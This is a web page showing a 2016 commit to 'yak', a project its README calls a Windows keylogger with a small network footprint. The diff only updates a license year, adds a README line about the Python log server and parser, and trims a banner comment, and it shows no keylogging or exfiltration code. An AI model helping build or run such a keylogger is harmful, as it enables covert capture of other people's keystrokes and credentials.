aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorAlexander Pickering <alexandermpickering@gmail.com>2016-06-02 16:16:45 -0400
committerAlexander Pickering <alexandermpickering@gmail.com>2016-06-02 16:16:45 -0400
commit070e6ba804941b765276675d66b01fb5197159df (patch)
tree935d2a1ada4f50a8d93310e070fda70f9fdfed27
parentce73b265c933a6f5ad5381192d605a44a23f8634 (diff)
downloadyak-070e6ba804941b765276675d66b01fb5197159df.tar.gz
yak-070e6ba804941b765276675d66b01fb5197159df.tar.bz2
yak-070e6ba804941b765276675d66b01fb5197159df.zip
Updated various thingsHEADmaster
-rw-r--r--LISCENSE2
-rw-r--r--README.md2
-rw-r--r--server/ParserMinimal.py16
3 files changed, 6 insertions, 14 deletions
diff --git a/LISCENSE b/LISCENSE
index 21a55a2..67cd941 100644
--- a/LISCENSE
+++ b/LISCENSE
@@ -1,4 +1,4 @@
-Copyright (c) 2014, Alexander Pickering
+Copyright (c) 2014-2016, Alexander Pickering
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
diff --git a/README.md b/README.md
index 73dea3e..e75d56b 100644
--- a/README.md
+++ b/README.md
@@ -4,3 +4,5 @@ YAK-Yet-Another-Keylogger
A simple keylogger for windows, focusing on small network footprint
A compiled binary is not distributed. You must build it from the source yourself.
+
+Requires python to run the server & log parser
diff --git a/server/ParserMinimal.py b/server/ParserMinimal.py
index fc8757b..4c1e9a7 100644
--- a/server/ParserMinimal.py
+++ b/server/ParserMinimal.py
@@ -1,18 +1,8 @@
import os
import sys
"""
-/---Y E T A N O T H E R K E Y L O G G E R---\
-| |
-|B Y : A L E X A N D E R P I C K E R I N G|
-| |
-|V I S I T C O G A R . O R G|
-| |
-|C O N T A C T |
-| |
-|I R C . R I Z O N . N E T # c y b e r |
-| |
-|S K Y P E b b b l i t z |
-\-----------------------------------------------/
+Yet Another Keylogger by Alexander Pickering
+Visit cogarr.net
"""
class parser():
logs = {}
@@ -81,7 +71,7 @@ class parser():
f.close()
else:
pass
-
+
def __init__(self):
for root,dirs,files in os.walk("./logs/"):
x = 0